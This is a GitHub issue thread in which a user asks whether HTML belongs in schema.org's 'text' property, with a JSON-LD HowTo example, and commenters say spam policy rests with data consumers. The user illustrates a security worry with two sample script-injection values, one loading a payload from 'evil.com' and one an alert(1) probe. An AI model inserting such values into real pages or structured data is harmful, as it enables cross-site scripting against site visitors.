### ISSUE TITLE
Question: Adding HTML to 'text' property - is it spam or not?

### ISSUE THREAD

**Issue by ghost** [schemaorg/schemaorg#2248]
Hello,

I did a quick search in the issues, but it's hard to know if this has been asked before due to the large amount of issues currently open.

I have a quick question with regards to the property: [Text](https://schema.org/Text)

**Question**: Are you allowed to add HTML code to the text property?

The way I see this property is the same like `jQuery` with regards to `text()` and `html()`. One allowing HTML code and the other as pure text only.

There is no information in regards to this on the schema.org website, hence I decided to ask here.

Please take the following code example:

```javascript
<script type="application/ld+json">
{
  "@context": "http://schema.org/",
  "@type": "HowTo",
  "name": "Can you add HTML to text fields?",
  "step": [
    {
      "@type": "HowToSection",
      "name": "How to do Something",
      "position": "1",
      "itemListElement": [
        {      
          "@type": "HowToStep",
          "position": "1",
          "itemListElement": [
            {
              "@type": "HowToDirection",
              "position": "1",
              "text": "Responding to a Slash Command involves 3 possible steps, depending on how complex your app might be. <ul><li><a href=\"https://www.example.com/something#responding_basic_receipt\">Confirming receipt of the Command</a></li><li><a href=\"https://www.example.com/something#responding_immediate_response\">Sending an immediate response</a></li><li><a href=\"https://awww.example.com/something#responding_response_url\">Sending delayed responses</a> </li></ul>"
            }
          ]
        }
      ]
    }
  ]
}
</script>
```

Notice that I have added HTML code inside the `text` property in the above code example.

When Google Search uses this schema they display even more links in their SERPS, this seems a good way to spam a search engine to gain more real estate on the web page.

![1 - Copy](https://user-images.githubusercontent.com/17784082/57773001-e4008e80-770e-11e9-9f72-6abd4831a5bc.png)

What's to stop Hackers from injecting javascript instead of DoFollow links directly into a search engine via schema as well, if the Search Engine is running the HTML code e.g.

```javascript
"text": "<script src=\"http://evil.com/payload.js\"></script>"

"text": "<script\x20type="text/javascript">javascript:alert(1);</script>"
```

Look forward to any answers and feedback,

Thanks.

**Comment by asimqt** [comment]
@ayumihamsaki We have a news app and we're putting HTML as the `Text` content now in the `ArticleBody`. We don't know whether we are being penalized by Google or not. 

BTW did you try putting the script? 😄

**Comment by jvandriel** [comment]
Schema.org doesn't make any statements on what's considered spam or not. That's up to each individual data consumer to decide for themselves.

Here on Github we discuss and handle the development of the vocabulary itself. So please ask these questions over at Google's development forums.
